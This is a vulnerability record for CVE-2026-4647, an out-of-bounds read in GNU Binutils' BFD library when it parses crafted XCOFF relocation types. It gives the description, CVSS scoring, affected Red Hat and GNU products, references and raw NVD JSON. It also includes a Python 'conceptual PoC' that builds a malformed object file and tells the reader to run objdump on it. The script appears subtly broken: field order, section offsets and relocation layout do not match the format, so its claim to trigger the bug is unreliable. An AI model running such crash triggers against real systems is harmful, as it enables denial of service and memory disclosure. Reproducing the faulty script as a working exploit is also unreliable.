Security Vulnerability Report
CVE-2026-4647 CVSS 6.1 MEDIUM

CVE-2026-4647

Published: 2026-03-23 14:16:37
Last Modified: 2026-03-24 19:02:03

Description

A flaw was found in the GNU Binutils BFD library, a widely used component for handling binary files such as object files and executables. The issue occurs when processing specially crafted XCOFF object files, where a relocation type value is not properly validated before being used. This can cause the program to read memory outside of intended bounds. As a result, affected tools may crash or expose unintended memory contents, leading to denial-of-service or limited information disclosure risks.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils (BFD Library)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Conceptual PoC for CVE-2026-4647
# This script generates a malformed XCOFF object file with an invalid relocation type.


def create_malformed_xcoff(filename):
    # XCOFF File Header (Magic 0x01DF for 64-bit XCOFF)
    magic = 0x01DF
    nsyms = 0
    nscns = 1
    timdat = 0
    symptr = 0
    opthdr = 0
    flags = 0

    header = struct.pack(">HHIIIIII", magic, 2, nscns, timdat, symptr, nsyms, opthdr, flags)

    # Section Header (.text)
    s_name = b".text\x00\x00\x00\x00"
    s_paddr = 0
    s_vaddr = 0
    s_size = 100
    s_scnptr = 200
    s_relptr = 300  # Offset to relocation entries
    s_lnnoptr = 0
    s_nreloc = 1  # Number of relocation entries
    s_nlnno = 0
    s_flags = 0x20  # STYP_TEXT

    # Format: 8-byte name, six 32-bit fields, two 16-bit counts, 32-bit flags
    # (one format code per value passed below).
    section_header = struct.pack(">8sIIIIIIHHI", s_name, s_paddr, s_vaddr, s_size,
                                 s_scnptr, s_relptr, s_lnnoptr, s_nreloc, s_nlnno, s_flags)

    # Relocation Entry
    # The vulnerability is triggered by an invalid 'r_rtype' value used in array indexing
    r_vaddr = 0
    r_symndx = 0
    r_rtype = 0xDEADBEEF  # Invalid relocation type to trigger Out-of-Bounds Read

    relocation_entry = struct.pack(">III", r_vaddr, r_symndx, r_rtype)

    # Padding
    raw_data = b"\x00" * 100
    current_size = len(header) + len(section_header) + len(raw_data)
    padding = b"\x00" * (s_relptr - current_size)

    with open(filename, "wb") as f:
        f.write(header)
        f.write(section_header)
        f.write(raw_data)
        f.write(padding)
        f.write(relocation_entry)

    print(f"Malformed XCOFF file created: {filename}")
    print("Trigger using: objdump -r " + filename)


if __name__ == "__main__":
    create_malformed_xcoff("cve_2026_4647_poc.o")

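References

https://access.redhat.com/security/cve/CVE-2026-4647 (Mitigation, Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2450302 (Issue Tracking, Vendor Advisory)
https://sourceware.org/bugzilla/show_bug.cgi?id=33919 (Broken Link)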

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4647", "sourceIdentifier": "[email protected]", "published": "2026-03-23T14:16:36.753", "lastModified": "2026-03-24T19:02:03.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the GNU Binutils BFD library, a widely used component for handling binary files such as object files and executables. The issue occurs when processing specially crafted XCOFF object files, where a relocation type value is not properly validated before being used. This can cause the program to read memory outside of intended bounds. As a result, affected tools may crash or expose unintended memory contents, leading to denial-of-service or limited information disclosure risks."}, {"lang": "es", "value": "Se encontró una falla en la biblioteca BFD de GNU Binutils, un componente ampliamente utilizado para manejar archivos binarios como archivos objeto y ejecutables. El problema ocurre al procesar archivos objeto XCOFF especialmente manipulados, donde un valor de tipo de reubicación no se valida correctamente antes de ser utilizado. Esto puede causar que el programa lea memoria fuera de los límites previstos. 
Como resultado, las herramientas afectadas pueden bloquearse o exponer contenidos de memoria no deseados, lo que lleva a una denegación de servicio o a riesgos limitados de revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:*", "matchCriteriaId": "70CA109B-85B9-4EF2-9A5F-A7D12F6EA878"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-4647", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450302", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33919", "source": "[email protected]", "tags": ["Broken Link"]}]}}